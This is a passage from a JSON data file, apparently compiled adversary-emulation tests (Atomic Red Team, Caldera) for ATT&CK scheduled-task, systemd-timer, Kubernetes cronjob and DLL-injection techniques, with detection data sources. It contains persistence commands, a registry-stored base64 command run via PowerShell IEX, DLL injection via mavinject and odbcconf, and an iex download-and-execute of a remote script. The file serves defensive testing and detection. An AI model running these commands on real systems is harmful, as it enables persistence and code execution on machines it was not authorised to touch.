notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. 
Does the same thing as Register-ScheduledTask cmdlet behind the scenes.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$xml = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", + "cleanup_command": "Unregister-ScheduledTask -TaskName \"T1053_005_WMI\" -confirm:$false >$null 2>&1\n" + } + }, + { + "name": "Scheduled Task Executing Base64 Encoded Commands From Registry", + "auto_generated_guid": "e895677d-4f06-49ab-91b6-ae3742d0a2ba", + "description": "A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.\nThe scheduled task will launch powershell to decode and run the command in the rgistry daily.\nThis is a persistence mechanism recently seen in use by Qakbot. 
\n\n[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "time": { + "description": "Daily scheduled task execution time", + "type": "string", + "default": "07:45" + } + }, + "executor": { + "command": "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st #{time}\n", + "cleanup_command": "schtasks /delete /tn \"ATOMIC-T1053.005\" /F >nul 2>&1\nreg delete HKCU\\SOFTWARE\\ATOMIC-T1053.005 /F >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.006", + "command_list": [ + "echo \"[Unit]\" > /etc/systemd/system/art-timer.service\necho \"Description=Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.service\necho \"[Service]\" >> /etc/systemd/system/art-timer.service\necho \"Type=simple\" >> /etc/systemd/system/art-timer.service\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> /etc/systemd/system/art-timer.service\necho \"[Install]\" >> /etc/systemd/system/art-timer.service\necho \"WantedBy=multi-user.target\" >> /etc/systemd/system/art-timer.service\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> 
#{path_to_systemd_service}\necho \"[Unit]\" > /etc/systemd/system/art-timer.timer\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.timer\necho \"Requires=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"[Timer]\" >> /etc/systemd/system/art-timer.timer\necho \"Unit=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"OnCalendar=*-*-* *:*:00\" >> /etc/systemd/system/art-timer.timer\necho \"[Install]\" >> /etc/systemd/system/art-timer.timer\necho \"WantedBy=timers.target\" >> /etc/systemd/system/art-timer.timer\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=art-timer.service\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=art-timer.service\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> 
#{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start art-timer.timer\nsystemctl enable art-timer.timer\nsystemctl daemon-reload\n", + "systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n" + ], + "commands": [ + { + "command": "echo \"[Unit]\" > /etc/systemd/system/art-timer.service\necho \"Description=Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.service\necho \"[Service]\" >> /etc/systemd/system/art-timer.service\necho \"Type=simple\" >> /etc/systemd/system/art-timer.service\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> /etc/systemd/system/art-timer.service\necho \"[Install]\" >> /etc/systemd/system/art-timer.service\necho \"WantedBy=multi-user.target\" >> /etc/systemd/system/art-timer.service\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> 
#{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > /etc/systemd/system/art-timer.timer\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> /etc/systemd/system/art-timer.timer\necho \"Requires=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"[Timer]\" >> /etc/systemd/system/art-timer.timer\necho \"Unit=#{systemd_service_name}\" >> /etc/systemd/system/art-timer.timer\necho \"OnCalendar=*-*-* *:*:00\" >> /etc/systemd/system/art-timer.timer\necho \"[Install]\" >> /etc/systemd/system/art-timer.timer\necho \"WantedBy=timers.target\" >> /etc/systemd/system/art-timer.timer\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho 
\"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=art-timer.service\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=art-timer.service\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> #{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start art-timer.timer\nsystemctl enable art-timer.timer\nsystemctl daemon-reload\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" 
+ }, + { + "command": "systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + }, + { + "command": "systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "source": "atomics/T1053.006/T1053.006.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Systemd Timers" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.006", + "display_name": "Scheduled Task/Job: Systemd Timers", + "atomic_tests": [ + { + "name": "Create Systemd Service and Timer", + "auto_generated_guid": "f4983098-bb13-44fb-9b2c-46149961807b", + "description": "This test creates Systemd service and timer then starts and enables the Systemd timer \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_systemd_service": { + "description": "Path to systemd service unit file", + "type": "Path", + "default": "/etc/systemd/system/art-timer.service" + }, + "path_to_systemd_timer": { + "description": "Path to service timer file", + "type": "Path", + "default": "/etc/systemd/system/art-timer.timer" + }, + "systemd_service_name": { + "description": "Name of systemd service", + "type": "String", + "default": "art-timer.service" + }, + "systemd_timer_name": { + "description": "Name of systemd service timer", + "type": "String", + "default": "art-timer.timer" + } + }, + "executor": { + "command": "echo \"[Unit]\" > #{path_to_systemd_service}\necho \"Description=Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_service}\necho \"[Service]\" >> #{path_to_systemd_service}\necho \"Type=simple\" >> #{path_to_systemd_service}\necho \"ExecStart=/bin/touch /tmp/art-systemd-timer-marker\" >> #{path_to_systemd_service}\necho \"[Install]\" >> #{path_to_systemd_service}\necho \"WantedBy=multi-user.target\" >> 
#{path_to_systemd_service}\necho \"[Unit]\" > #{path_to_systemd_timer}\necho \"Description=Executes Atomic Red Team Systemd Timer Service\" >> #{path_to_systemd_timer}\necho \"Requires=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"[Timer]\" >> #{path_to_systemd_timer}\necho \"Unit=#{systemd_service_name}\" >> #{path_to_systemd_timer}\necho \"OnCalendar=*-*-* *:*:00\" >> #{path_to_systemd_timer}\necho \"[Install]\" >> #{path_to_systemd_timer}\necho \"WantedBy=timers.target\" >> #{path_to_systemd_timer}\nsystemctl start #{systemd_timer_name}\nsystemctl enable #{systemd_timer_name}\nsystemctl daemon-reload\n", + "cleanup_command": "systemctl stop #{systemd_timer_name}\nsystemctl disable #{systemd_timer_name}\nrm #{path_to_systemd_service}\nrm #{path_to_systemd_timer}\nsystemctl daemon-reload\n", + "name": "bash" + } + }, + { + "name": "Create a user level transient systemd service and timer", + "auto_generated_guid": "3de33f5b-62e5-4e63-a2a0-6fd8808c80ec", + "description": "Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. 
\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if systemd-run exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v systemd-run)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Install systemd on the machine.\"; exit 1;\n" + } + ], + "executor": { + "elevation_required": false, + "command": "systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "cleanup_command": "systemctl --user stop Atomic-Red-Team.service\nsystemctl --user stop Atomic-Red-Team.timer\nrm /tmp/log\n", + "name": "sh" + } + }, + { + "name": "Create a system level transient systemd service and timer", + "auto_generated_guid": "d3eda496-1fc0-49e9-aff5-3bec5da9fa22", + "description": "Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. 
\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if systemd-run exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v systemd-run)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Install systemd on the machine.\"; exit 1;\n" + } + ], + "executor": { + "elevation_required": true, + "command": "systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo \"$(date) $(whoami)\" >>/tmp/log'\n", + "cleanup_command": "systemctl stop Atomic-Red-Team.service\nsystemctl stop Atomic-Red-Team.timer\nrm /tmp/log\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.007", + "command_list": [ + "kubectl get cronjobs -n default\n", + "kubectl create -f src/cronjob.yaml -n default\n" + ], + "commands": [ + { + "command": "kubectl get cronjobs -n default\n", + "source": "atomics/T1053.007/T1053.007.yaml", + "name": "Atomic Red Team Test - Kubernetes Cronjob" + }, + { + "command": "kubectl create -f src/cronjob.yaml -n default\n", + "source": "atomics/T1053.007/T1053.007.yaml", + "name": "Atomic Red Team Test - Kubernetes Cronjob" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.007", + "display_name": "Kubernetes Cronjob", + "atomic_tests": [ + { + "name": "ListCronjobs", + "auto_generated_guid": "ddfb0bc1-3c3f-47e9-a298-550ecfefacbd", + "description": "Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. 
Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to list", + "type": "String", + "default": "default" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl get cronjobs -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + }, + { + "name": "CreateCronjob", + "auto_generated_guid": "f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3", + "description": "Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. 
Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to list", + "type": "String", + "default": "default" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl create -f src/cronjob.yaml -n #{namespace}\n", + "cleanup_command": "kubectl delete cronjob art -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + 
"collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1055.001", + "command_list": [ + "$mypid = (Start-Process notepad -PassThru).id\nmavinject $mypid /INJECTRUNNING #{dll_payload}\nStop-Process -processname notepad\n", + "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING PathToAtomicsFolder\\T1055.001\\src\\x64\\T1055.001.dll\nStop-Process -processname notepad\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')", + "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n" + ], + "commands": [ + { + "command": "$mypid = (Start-Process notepad 
-PassThru).id\nmavinject $mypid /INJECTRUNNING #{dll_payload}\nStop-Process -processname notepad\n", + "source": "atomics/T1055.001/T1055.001.yaml", + "name": "Atomic Red Team Test - Process Injection: Dynamic-link Library Injection" + }, + { + "command": "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING PathToAtomicsFolder\\T1055.001\\src\\x64\\T1055.001.dll\nStop-Process -processname notepad\n", + "source": "atomics/T1055.001/T1055.001.yaml", + "name": "Atomic Red Team Test - Process Injection: Dynamic-link Library Injection" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')", + "source": "atomics/T1055.001/T1055.001.yaml", + "name": "Atomic Red Team Test - Process Injection: Dynamic-link Library Injection" + }, + { + "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n", + "source": "data/abilities/defense-evasion/a74bc239-a196-4f7e-8d5c-fe8c0266071c.yml", + "name": "Leverage odbcconf for DLL injection" + } + ], + "parsed_datasets": [ + { + "attack_technique": 